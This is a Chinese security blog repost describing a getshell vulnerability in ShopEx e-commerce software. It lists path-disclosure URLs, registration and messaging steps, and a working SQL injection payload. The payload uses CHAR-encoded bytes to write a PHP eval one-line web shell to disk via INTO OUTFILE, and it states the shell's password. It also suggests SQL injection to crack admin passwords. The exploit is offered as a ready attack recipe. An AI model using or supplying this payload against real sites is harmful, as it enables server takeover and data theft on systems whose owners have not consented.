shopex 前台普通用户 getshell 漏洞

admin 2021年4月3日19:28:32评论98 views字数 848阅读2分49秒阅读模式

利用方法:

第一个:

想办法找到目标网站的绝对路径

http://www.test.com/install/svinfo.php?phpinfo=true
http://www.test.com/core/api/shop_api.php
http://www.test.com/core/api/site/2.0/api_b2b_2_0_cat.php
http://www.test.com/core/api/site/2.0/api_b2b_2_0_goodstype.php
http://www.test.com/core/api/site/2.0/api_b2b_2_0_brand.php

shopex存在很多爆路径的漏洞,请自行研究。

第二个:

注册一个普通用户

http://www.test.com/?passport-signup.html

第三个:

发送消息

http://www.test.com/?member-send.html

代码

wooyun.in' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。

如果无法getshell的话,也可以尝试注入,破密码进后台也一样

shell图

文章来源于lcx.cc:shopex 前台普通用户 getshell 漏洞

相关推荐: 揭秘乌云网:中国最大的黑客培训基地?

10月10日,如家等酒店开房信息泄露;10月29日,来往被指存漏洞波及支付宝;11月5日,搜狗浏览器被曝存在重大安全漏洞;11月20日,腾讯7000万QQ群用户数据被指泄露;11月26日,360出现任意用户修改密码漏洞;甚至连相关部门网站漏洞也被公布....。…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:28:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   shopex 前台普通用户 getshell 漏洞http://cn-sec.com/archives/322742.html

发表评论

匿名网友 填写信息